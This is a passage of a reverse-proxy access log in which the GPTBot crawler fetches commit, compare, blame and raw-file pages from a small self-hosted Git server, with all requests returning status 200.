compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:29:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 442170] [Gzip 15.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:29:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 191301] [Gzip 12.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" -[17/Feb/2026:13:29:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-change" [Client 74.7.227.38] [Length 388200] [Gzip 13.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 387836] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 388251] [Gzip 13.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main..a0a212e41c7ebc2699ea736d71d145b9844673ec" [Client 74.7.227.38] [Length 11063] [Gzip 3.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 234364] [Gzip 16.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 216884] [Gzip 13.83] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:29:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 17228] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:29:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 74.7.227.38] [Length 11297] [Gzip 4.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec...main" [Client 74.7.227.38] [Length 288754] [Gzip 12.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/main...a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..main" [Client 74.7.227.38] [Length 558410] [Gzip 13.33] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main...ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 74.7.227.38] [Length 8441] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...main" -[17/Feb/2026:13:29:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-change" [Client 74.7.227.38] [Length 442166] [Gzip 15.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-change" -[17/Feb/2026:13:29:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 441711] [Gzip 15.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:29:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 442161] [Gzip 15.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:29:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..main" [Client 74.7.227.38] [Length 288754] [Gzip 12.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/main..a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 217467] [Gzip 13.90] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=unified&whitespace=ignore-eol" -[17/Feb/2026:13:29:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 216728] [Gzip 13.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=unified&whitespace=ignore-all" -[17/Feb/2026:13:29:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 387854] [Gzip 13.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main..ebd2be03a23e76e126207d40a257d72f40ab9a7c" [Client 74.7.227.38] [Length 12462] [Gzip 4.39] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/a0a212e41c7ebc2699ea736d71d145b9844673ec..ebd2be03a23e76e126207d40a257d72f40ab9a7c" -[17/Feb/2026:13:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 17045] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" -[17/Feb/2026:13:29:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17046] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" -[17/Feb/2026:13:29:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=unified&whitespace=ignore-all" [Client 74.7.227.38] [Length 211449] [Gzip 13.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" -[17/Feb/2026:13:29:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=unified&whitespace=ignore-eol" [Client 74.7.227.38] [Length 211448] [Gzip 13.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" -[17/Feb/2026:13:29:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 441719] [Gzip 15.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c..a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 441698] [Gzip 15.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:29:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 17226] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=split&whitespace=ignore-change" -[17/Feb/2026:13:29:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 17228] [Gzip 3.70] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=split&whitespace=ignore-change" -[17/Feb/2026:13:29:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=split&whitespace=ignore-all" [Client 74.7.227.38] [Length 234355] [Gzip 16.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=split&whitespace=ignore-change" -[17/Feb/2026:13:30:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=split&whitespace=ignore-eol" [Client 74.7.227.38] [Length 234343] [Gzip 16.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=split&whitespace=ignore-change" -[17/Feb/2026:13:30:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 190797] [Gzip 12.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" -[17/Feb/2026:13:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 387839] [Gzip 13.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/ebd2be03a23e76e126207d40a257d72f40ab9a7c...a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:30:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 17026] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/18fa480c84b358da8bf50d54057f53591759225f" -[17/Feb/2026:13:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96?show-outdated=&style=split&whitespace=show-all" [Client 74.7.227.38] [Length 217024] [Gzip 13.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" -[17/Feb/2026:13:30:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/compare/main...main" [Client 74.7.227.38] [Length 8397] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/compare/main...a0a212e41c7ebc2699ea736d71d145b9844673ec" -[17/Feb/2026:13:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 211457] [Gzip 13.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/bf87175f515287fd25d175843915ffa6178025eb" -[17/Feb/2026:13:30:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" [Client 74.7.227.38] [Length 2253] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/Wireguard%20%EC%84%A4%EC%A0%95%20%EB%B0%A9%EB%B2%95.txt" -[17/Feb/2026:13:30:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80" [Client 74.7.227.38] [Length 18077] [Gzip 3.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80" -[17/Feb/2026:13:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" [Client 74.7.227.38] [Length 14567] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96" -[17/Feb/2026:13:30:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" -[17/Feb/2026:13:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/update_status.py" -[17/Feb/2026:13:30:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" [Client 74.7.227.38] [Length 18811] [Gzip 9.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" -[17/Feb/2026:13:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/update_status.py" -[17/Feb/2026:13:30:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/update_status.py" -[17/Feb/2026:13:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" [Client 74.7.227.38] [Length 18811] [Gzip 9.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/mail_contact.py" -[17/Feb/2026:13:30:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" [Client 74.7.227.38] [Length 3922] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/mail_contact.py" -[17/Feb/2026:13:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/About.tsx" -[17/Feb/2026:13:30:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 35972] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/controller-cpp2.md" -[17/Feb/2026:13:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" [Client 74.7.227.38] [Length 9509] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/fallback_stream_access.log" -[17/Feb/2026:13:30:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr 